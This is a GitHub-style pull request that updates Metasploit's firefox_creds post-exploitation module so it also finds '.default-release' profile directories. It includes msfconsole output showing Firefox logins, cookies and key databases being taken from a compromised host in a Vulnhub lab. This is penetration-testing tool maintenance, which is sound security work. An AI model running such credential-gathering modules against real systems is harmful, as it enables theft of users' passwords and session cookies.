### PR TITLE
Support more recent versions of Firefox's default profile directory

### DIFF
--- a/modules/post/multi/gather/firefox_creds.rb
+++ b/modules/post/multi/gather/firefox_creds.rb
@@ -263,7 +263,7 @@ class MetasploitModule < Msf::Post
 
         checkpath.each_line do |ffpath|
           ffpath.chomp!
-          if ffpath =~ /\.default$/
+          if ffpath =~ /\.default(?:-release)?$/
             vprint_good("Found profile: #{ffpath}")
             paths << "#{ffpath}"
           end


### PR DESCRIPTION
The default firefox profile directory now no longer ends in `.default` but instead `.default-release`. For backwards compat the new regex supports both. For more information see:

https://support.mozilla.org/bm/questions/1264072#answer-1235567

It's possible we might want to also support things like `.default-nightly`, etc but really if we want to do more than grab the default profile we should read the `profiles.ini` file to get an itemized list of profiles from Firefox itself. This would also future-proof this script and allow us to capture non-default profiles.

Since profiles are not generally used by most Firefox users just going for the simpler solution of adjusting the regex.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use post/multi/gather/firefox_creds`
- [ ] **Verify** the thing does what it should

```
msf6 post(multi/gather/firefox_creds) > set SESSION 1
SESSION => 1
msf6 post(multi/gather/firefox_creds) > run

[*] Checking for Firefox profile in: /home/minhtuan/.mozilla/firefox

[*] Profile: /home/minhtuan/.mozilla/firefox/fvbljmev.default-release
[+] Downloaded logins.json: /home/kali/.msf4/loot/20210310215308_default_172.16.3.129_ff.fvbljmev.logi_049030.bin
[+] Downloaded cookies.sqlite: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.cook_856738.bin
[+] Downloaded cert9.db: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.cert_400135.db
[+] Downloaded key4.db: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.key4_501159.db

[*] Profile: /home/minhtuan/.mozilla/firefox/1snfwp29.default

[*] Post module execution completed
```

Can test it out yourself on this Vulnhub - https://www.vulnhub.com/entry/bluesky-1,623/